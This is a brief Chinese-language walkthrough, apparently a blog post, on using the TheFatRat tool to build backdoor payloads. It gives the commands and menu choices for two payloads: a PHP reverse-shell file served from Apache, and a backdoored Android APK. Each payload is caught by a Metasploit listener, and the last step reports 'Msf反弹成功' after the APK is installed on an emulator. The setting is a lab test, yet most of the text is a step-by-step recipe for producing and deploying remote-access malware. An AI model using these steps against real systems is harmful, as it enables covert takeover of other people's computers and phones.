项目地址:https://github.com/Screetsec/TheFatRat
安装TheFatRat
root@sch01ar:/sch01ar# git clone https://github.com/Screetsec/TheFatRat root@sch01ar:/sch01ar# cd TheFatRat/ && ls root@sch01ar:/sch01ar/TheFatRat# chmod +x setup.sh root@sch01ar:/sch01ar/TheFatRat# ./setup.sh
安装完成后直接在终端输入fatrat启动
root@sch01ar:~# fatrat
回车
回车
回车
这是菜单界面
这里测试两个功能,首先测试反弹电脑的
选择1,回车
这里有多个文件类型可以选择,我就测试php的,选择5,回车
填写好配置信息
在output目录下生成了文件
将sch01ar.php移动到/var/www/html/目录下
root@sch01ar:~# mv /sch01ar/TheFatRat/output/sch01ar.php /var/www/html/
开启apache2服务
root@sch01ar:~# service apache2 start
开启msf,设置好配置
然后exploit –j
用试验机win08去访问http://192.168.220.131/sch01ar.php
然后测试安卓的
在主菜单选择1,然后选择3
然后配置,填写好ip和端口
设置payload,选择3
选择完后显示配置的信息
回车
选择y,将会生成一个后缀为rc的文件,方便以后msf连接
然后命名rc文件
回车
root@sch01ar:~# cd /sch01ar/TheFatRat/config/listeners/ && ls
root@sch01ar:/sch01ar/TheFatRat/config/listeners# msfconsole -r sch01ar.rc
启动msf,等待着反弹就好了
打开apk在的文件夹
把apk文件放到模拟器上安装
点击
Msf反弹成功
